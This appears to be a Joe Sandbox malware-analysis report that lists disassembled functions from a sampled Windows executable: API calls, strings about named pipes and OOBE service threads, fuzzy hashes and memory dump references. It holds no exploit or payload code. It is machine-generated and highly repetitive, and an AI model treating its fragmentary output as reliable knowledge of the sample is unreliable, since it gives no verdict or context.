                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite$Sleep
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Number of retries to write to pipe exhausted with last error = %lu. Aborting write on pipe %p$OOBEUtils$Write failed or else (No of bytes written > data). Aborting write on pipe %p , errno: %lu
                                                                                                                                                                                                                                                                    • API String ID: 2338600601-2345992799
                                                                                                                                                                                                                                                                    • Opcode ID: b8e0a7f11eae0cb03ddd70be310acbc4cd459f475ee6759fc557cd37cf45340b
                                                                                                                                                                                                                                                                    • Instruction ID: bbdbd7131a9a05eaf625d8743bffc745cebe138b644272fe07d0d675cb0cef45
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8e0a7f11eae0cb03ddd70be310acbc4cd459f475ee6759fc557cd37cf45340b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13411635B00208BBDB10DFA69C42BBF7B68EB55721F1001BBF815A32C0DA746D4087A8
                                                                                                                                                                                                                                                                    Function 004163F0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,00404D5E,?), ref: 00416418
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 004164B4
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004164CB
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041651E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                    • String ID: Error allocating memory while converting Native string to UTF8 string$Failed to convert WideCharToMultiByte. ErrorCode::%d$OOBEUtils$StringUtils
                                                                                                                                                                                                                                                                    • API String ID: 203985260-2236274340
                                                                                                                                                                                                                                                                    • Opcode ID: e39f2a51ba932da9826a003946e3c0e9b08f0d17437669bc90833129a53970bc
                                                                                                                                                                                                                                                                    • Instruction ID: 716146f1c0389004c4db2de1f4adde63d4e0a6c81021537d3ce57664b142a41d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e39f2a51ba932da9826a003946e3c0e9b08f0d17437669bc90833129a53970bc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28417B3578031477DA20AF1AAC47FEA7794EB42B21F2400BBFD09632D0D9696D4487AD
                                                                                                                                                                                                                                                                    Function 00403C90 Relevance: 13.6, APIs: 2, Strings: 7, Instructions: 137sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • Failed to create the connection channel, xrefs: 00403D34
                                                                                                                                                                                                                                                                    • Failed to initiate communication, xrefs: 00403DCB
                                                                                                                                                                                                                                                                    • Communication is open on the other pipe. Closing the static guid and re-opening for new clients..., xrefs: 00403DF4
                                                                                                                                                                                                                                                                    • Problem initializing Connection Channel. Quitting., xrefs: 00403D11
                                                                                                                                                                                                                                                                    • Successfully initiated communication, xrefs: 00403DAA
                                                                                                                                                                                                                                                                    • Initializing1 Connection Channel with Service with pipename: %s, xrefs: 00403CD0
                                                                                                                                                                                                                                                                    • Success:Initializing Connection Channel with Service with pipename: %s, xrefs: 00403D73
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                                                    • String ID: Communication is open on the other pipe. Closing the static guid and re-opening for new clients...$Failed to create the connection channel$Failed to initiate communication$Initializing1 Connection Channel with Service with pipename: %s$Problem initializing Connection Channel. Quitting.$Success:Initializing Connection Channel with Service with pipename: %s$Successfully initiated communication
                                                                                                                                                                                                                                                                    • API String ID: 3472027048-2173017273
                                                                                                                                                                                                                                                                    • Opcode ID: 6df400194c0d2eafb8ad463674300954c48552a7f74c4dd405dff45e14274271
                                                                                                                                                                                                                                                                    • Instruction ID: 5187b662ea0dd10bef7ca44164715a625855074a8d72d76878ed54e6067e5788
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6df400194c0d2eafb8ad463674300954c48552a7f74c4dd405dff45e14274271
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9141F170600200EFCB10DF19DC89B5A7BA8AF49705F1440BAE909BB3D1CB78ED44CBA9
                                                                                                                                                                                                                                                                    Function 00418B10 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 330COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418B88
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418BAF
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00418C74
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00418C8E
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418D23
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00418D30
                                                                                                                                                                                                                                                                      • Part of subcall function 0046877A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00468786
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$LockitLockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                                    • API String ID: 1871079455-1405518554
                                                                                                                                                                                                                                                                    • Opcode ID: c6cdc14bd338eddc53a98ba7adfe9d068b301496e6a84cf03d0ab39cc8f10731
                                                                                                                                                                                                                                                                    • Instruction ID: 2b18787ee60dced21a1ee80d710d234eacb2e1acb53e15705c8ae09ecf607236
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6cdc14bd338eddc53a98ba7adfe9d068b301496e6a84cf03d0ab39cc8f10731
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD16FB1E002189FDB00DFA5C984BDEBBB5BF58314F14406EE805A7391EB78AD45CB99
                                                                                                                                                                                                                                                                    Function 004013E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 295COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004013E5
                                                                                                                                                                                                                                                                      • Part of subcall function 0046873A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00468746
                                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00401519
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Workflow Start Failed, xrefs: 004016D6
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Workflow Started, xrefs: 0040168F
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Started, xrefs: 004015A6
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Returning from the worker thread, xrefs: 0040173D
                                                                                                                                                                                                                                                                    • string too long, xrefs: 004013E0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: ServiceWorkerThread: Started$ ServiceWorkerThread: Workflow Start Failed$ ServiceWorkerThread: Workflow Started$ServiceWorkerThread: Returning from the worker thread$string too long
                                                                                                                                                                                                                                                                    • API String ID: 3990507346-493984609
                                                                                                                                                                                                                                                                    • Opcode ID: d82a602f60015f722318a5e5598d58ea829feccefa44ef9ae6b957b033f1123a
                                                                                                                                                                                                                                                                    • Instruction ID: 0de4d92833269bd46795cda1e8f9f860099c4cf613756acb1c3ca96f5a9e6a69
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d82a602f60015f722318a5e5598d58ea829feccefa44ef9ae6b957b033f1123a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0A13BB1A002059BE710DF69DC42B6EB7A4EF40314F24427FE815E73D1EB78994487DA
                                                                                                                                                                                                                                                                    Function 00401DB0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 145COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils$Receiveded SERVICE_CONTROL_STOP signal$ServiceCtrlHandler: Finished$ServiceCtrlHandler: Started
                                                                                                                                                                                                                                                                    • API String ID: 0-3825141419
                                                                                                                                                                                                                                                                    • Opcode ID: 6ca62fb21f9d5d796d1c64262897b507ae4cdca6753128363298717e489f106b
                                                                                                                                                                                                                                                                    • Instruction ID: 66e086e936243a972247da67edb77e0195688db155f0063ebd03624c2dfed7a4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ca62fb21f9d5d796d1c64262897b507ae4cdca6753128363298717e489f106b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D51C270A81215ABEB10DB15DD46B5E3BA4EB00B18F14017BF905B73D1EF78A9048BEE
                                                                                                                                                                                                                                                                    Function 004165A0 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 154COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,00000000,?,00404FB7,00000000,00000000,004B0CCA,00000000), ref: 004165BA
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00416661
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00416678
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
